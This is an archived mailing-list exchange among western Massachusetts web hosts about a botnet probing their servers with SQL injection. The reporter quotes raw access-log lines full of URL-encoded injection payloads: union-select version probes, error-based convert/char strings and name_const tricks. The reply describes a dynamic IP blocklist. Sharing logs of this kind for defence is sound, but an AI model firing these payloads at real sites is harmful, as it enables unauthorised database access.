[Hidden-tech] Growing Botnet?

Paul Bissex paul at bissex.net
Mon Feb 15 21:25:10 UTC 2021 

Hi Mik,

I don't host others' sites these days but I do keep a close eye on 
suspicious requests to my pastebin site (dpaste.com) and maintain a 
blocklist. Out of curiosity I looked for the IPs you shared;  none of 
them are currently on my list. No SQL injection attempts either (though 
lots of 404s looking for wp-login.php).

Because of the whack-a-mole syndrome you identify, last year I moved to 
a dynamic blocking setup. I have automation to detect and block 
bad-behaving IPs; then I age them out if they go three days without 
reoffending.

The list is typically 1000 to 2000 IPs long.

I've had good results from this, and zero complaints from users whose IP 
happened to have been previously used by a botnet/spammer.

Good luck!

P

On 2/15/21 2:53 PM, Michael Muller via Hidden-discuss wrote:
>
> Hey HT web hosts out there,
>
> Due to recent hacking attempts against our servers, I have installed 
> an IP Tracker that tracks and blocks any aggressive activity.
>
> Starting late last week we've found a growing number of IP numbers 
> that appear to be attempting SQL Injection attacks. I've pasted a few 
> snippets from our logs, below.
>
> Anyone else seeing this kind of activity on their servers? Every time 
> I block an IP number they move to another IP number. The list of IPs 
> hitting us is growing, and moving across multiple hosts.
>
> So far, I've contacted four different server hosts about the traffic 
> coming from their servers. By far the most "infected" appears to be 
> the Unified Layer family of hosting companies, which includes 
> HostGator Mexico, webhostbox Bigrock India, and a number of others. 
> Additional sources of the attacks are Hetzner.com from Germany; Ozkula 
> from Turkey; and ColoCrossing from Buffalo NY. I'm sure more will be 
> added as the days go on.
>
> Stay safe.
>
> Mik
>
> 94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 
> /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33))) 
> 94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A 
> 94.130.76.249 13:38:47 fitzgerald-realestate.com /z 
> term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33))) 
> 94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1 
> 94.130.76.249 13:39:01 fitzgerald-realestate.com /z 
> term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 
> 94.130.76.249 13:39:03 fitzgerald-realestate.com /z 
> term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x 
> 94.130.76.249 13:39:04 fitzgerald-realestate.com /z 
> term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x 
> 94.130.76.249 13:39:06 fitzgerald-realestate.com /z 
> term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 
> 94.130.76.249 13:39:07 fitzgerald-realestate.com /z 
> term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x 
> 94.130.76.249 13:39:09 fitzgerald-realestate.com /z 
> term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x 
>
> 37.247.110.108 08:14:38 Greenfield-MA.gov /z 
> term=Licensing%20AND%201=1 37.247.110.108 08:14:42 Greenfield-MA.gov 
> /z 
> term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 
> 37.247.110.108 08:14:44 Greenfield-MA.gov /z 
> term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x 
> 37.247.110.108 08:14:46 Greenfield-MA.gov /z 
> term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x 
>
> 192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing 
> 192.3.204.226 14:58:56 Greenfield-MA.gov /z 
> term=Licensing2121121121212/1 192.3.204.226 14:58:57 Greenfield-MA.gov 
> /z term=Licensing%20AND%201=1 192.3.204.226 14:58:59 Greenfield-MA.gov 
> /z 
> term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 
> 192.3.204.226 14:59:00 Greenfield-MA.gov /z 
> term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
> ---
> Mik Muller, president
> Montague WebWorks
> 239-R Main Street, Greenfield, MA
> 413-320-5336
> http://MontagueWebWorks.com
> Powered by ROCKETFUSION

-- 
Paul Bissex, software engineer
http://paulbissex.com/
Greenfield MA 01301 USA
413-230-9451

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.hidden-tech.net/pipermail/hidden-discuss/attachments/20210215/0d2c6a01/attachment.html>

Google
More information about the Hidden-discuss mailing list